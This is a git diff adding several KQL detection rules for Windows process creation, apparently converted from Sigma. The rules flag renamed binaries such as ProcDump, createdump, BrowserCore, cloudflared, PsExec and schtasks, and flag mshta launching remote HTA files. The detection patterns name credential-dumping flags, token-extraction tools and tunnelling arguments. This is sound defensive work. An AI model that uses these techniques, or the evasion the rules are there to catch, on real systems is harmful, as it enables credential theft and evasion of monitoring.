diff --git a/KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql b/KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql
new file mode 100644
index 00000000..9537c7d5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql
@@ -0,0 +1,10 @@
+// Title: Remotely Hosted HTA File Executed Via Mshta.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-08
+// Level: high
+// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql
new file mode 100644
index 00000000..be62ef8f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed AutoHotkey.EXE Execution
+// Author: Nasreddine Bencherchali
+// Date: 2023-02-07
+// Level: medium
+// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql b/KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql
new file mode 100644
index 00000000..0901b0db
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed BOINC Client Execution
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the execution of a renamed BOINC binary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "BOINC.exe" and (not(FolderPath endswith "\\BOINC.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql
new file mode 100644
index 00000000..1f2cc434
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed BrowserCore.EXE Execution
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.t1528, attack.t1036.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "BrowserCore.exe" and (not(FolderPath endswith "\\BrowserCore.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql
new file mode 100644
index 00000000..b5eaa2ca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Cloudflared.EXE Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-20
+// Level: high
+// Description: Detects the execution of a renamed "cloudflared" binary.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")) or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run "))) and (not((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql b/KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql
new file mode 100644
index 00000000..438f1514
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql
@@ -0,0 +1,12 @@
+// Title: Renamed CreateDump Utility Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-20
+// Level: high
+// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+//   - Command lines that use the same flags
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql
new file mode 100644
index 00000000..463a23f7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed CURL.EXE Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-09-11
+// Level: medium
+// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql
new file mode 100644
index 00000000..4110a5a5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed FTP.EXE Execution
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql
new file mode 100644
index 00000000..86a7d55a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Gpg.EXE Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-08-09
+// Level: high
+// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql
new file mode 100644
index 00000000..5f70c8ee
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Jusched.EXE Execution
+// Author: Markus Neis, Swisscom
+// Date: 2019-06-04
+// Level: high
+// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql
new file mode 100644
index 00000000..44a49312
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Renamed Mavinject.EXE Execution
+// Author: frack113, Florian Roth
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_megasync_execution.kql b/KQL/rules/windows/process_creation/renamed_megasync_execution.kql
new file mode 100644
index 00000000..0cc57952
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_megasync_execution.kql
@@ -0,0 +1,13 @@
+// Title: Renamed MegaSync Execution
+// Author: Sittikorn S
+// Date: 2021-06-22
+// Level: high
+// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Software that illegally integrates MegaSync in a renamed form
+//   - Administrators that have renamed MegaSync
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql b/KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql
new file mode 100644
index 00000000..61cc55fb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Microsoft Teams Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-12
+// Level: medium
+// Description: Detects the execution of a renamed Microsoft Teams binary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName in~ ("msteams.exe", "teams.exe")) and (not((FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\teams.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql
new file mode 100644
index 00000000..d632c721
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Renamed Msdt.EXE Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects the execution of a renamed "Msdt.exe" binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql
new file mode 100644
index 00000000..c1b2c172
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed NirCmd.EXE Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-03-11
+// Level: high
+// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql
new file mode 100644
index 00000000..0a07c0bf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Office Binary Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-20
+// Level: high
+// Description: Detects the execution of a renamed office binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe", "Olk.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe" or FolderPath endswith "\\OLK.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql
new file mode 100644
index 00000000..1d5d21f5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed PingCastle Binary Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-01-11
+// Level: high
+// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_plink_execution.kql b/KQL/rules/windows/process_creation/renamed_plink_execution.kql
new file mode 100644
index 00000000..e60c660b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_plink_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Plink Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-06
+// Level: high
+// Description: Detects the execution of a renamed version of the Plink binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_procdump_execution.kql b/KQL/rules/windows/process_creation/renamed_procdump_execution.kql
new file mode 100644
index 00000000..9bdba836
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_procdump_execution.kql
@@ -0,0 +1,14 @@
+// Title: Renamed ProcDump Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-11-18
+// Level: high
+// Description: Detects the execution of a renamed ProcDump executable.
+// This often done by attackers or malware in order to evade defensive mechanisms.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+//   - Procdump illegally bundled with legitimate software.
+//   - Administrators who rename binaries (should be investigated).
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql b/KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql
new file mode 100644
index 00000000..4f6d2b2d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql
@@ -0,0 +1,12 @@
+// Title: Renamed PsExec Service Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate administrative tasks
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql b/KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql
new file mode 100644
index 00000000..759fc8db
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Remote Utilities RAT (RURAT) Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-19
+// Level: medium
+// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.collection, attack.command-and-control, attack.discovery, attack.s0592
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql b/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql
new file mode 100644
index 00000000..60fe47ba
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql
@@ -0,0 +1,14 @@
+// Title: Renamed Schtasks Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-27
+// Level: high
+// Description: Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.
+// One of the very common persistence techniques is schedule malicious tasks using schtasks.exe.
+// Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1036.003, attack.t1053.005
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " -tn " or ProcessCommandLine contains " /tn " or ProcessCommandLine contains " –tn " or ProcessCommandLine contains " —tn " or ProcessCommandLine contains " ―tn " or ProcessCommandLine contains " -tr " or ProcessCommandLine contains " /tr " or ProcessCommandLine contains " –tr " or ProcessCommandLine contains " —tr " or ProcessCommandLine contains " ―tr " or ProcessCommandLine contains " -sc " or ProcessCommandLine contains " /sc " or ProcessCommandLine contains " –sc " or ProcessCommandLine contains " —sc " or ProcessCommandLine contains " ―sc " or ProcessCommandLine contains " -st " or ProcessCommandLine contains " /st " or ProcessCommandLine contains " –st " or ProcessCommandLine contains " —st " or ProcessCommandLine contains " ―st " or ProcessCommandLine contains " -ru " or ProcessCommandLine contains " /ru " or ProcessCommandLine contains " –ru " or ProcessCommandLine contains " —ru " or ProcessCommandLine contains " ―ru " or ProcessCommandLine contains " -fo " or ProcessCommandLine contains " /fo " or ProcessCommandLine contains " –fo " or ProcessCommandLine contains " —fo " or ProcessCommandLine contains " ―fo ") and (ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create " or ProcessCommandLine contains " -delete " or ProcessCommandLine contains " /delete " or ProcessCommandLine contains " –delete " or ProcessCommandLine contains " —delete " or ProcessCommandLine contains " ―delete " or ProcessCommandLine contains " -query " or ProcessCommandLine contains " /query " or ProcessCommandLine contains " –query " or ProcessCommandLine contains " —query " or ProcessCommandLine contains " ―query " or ProcessCommandLine contains " -change " or ProcessCommandLine contains " /change " or ProcessCommandLine contains " –change " or ProcessCommandLine contains " —change " or ProcessCommandLine contains " ―change " or ProcessCommandLine contains " -run " or ProcessCommandLine contains " /run " or ProcessCommandLine contains " –run " or ProcessCommandLine contains " —run " or ProcessCommandLine contains " ―run " or ProcessCommandLine contains " -end " or ProcessCommandLine contains " /end " or ProcessCommandLine contains " –end " or ProcessCommandLine contains " —end " or ProcessCommandLine contains " ―end ")) and (not(ProcessCommandLine contains "schtasks"))) or (ProcessVersionInfoOriginalFileName =~ "schtasks.exe" and (not(FolderPath endswith "\\schtasks.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql b/KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql
new file mode 100644
index 00000000..df3db5cf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed SysInternals DebugView Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-28
+// Level: high
+// Description: Detects suspicious renamed SysInternals DebugView execution
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName =~ "Sysinternals DebugView" and (not((FolderPath endswith "\\Dbgview.exe" and ProcessVersionInfoOriginalFileName =~ "Dbgview.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql b/KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql
new file mode 100644
index 00000000..60d1182a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql
@@ -0,0 +1,12 @@
+// Title: Renamed Sysinternals Sdelete Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-06
+// Level: high
+// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+// False Positives:
+//   - System administrator usage
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe")))
\ No newline at end of file
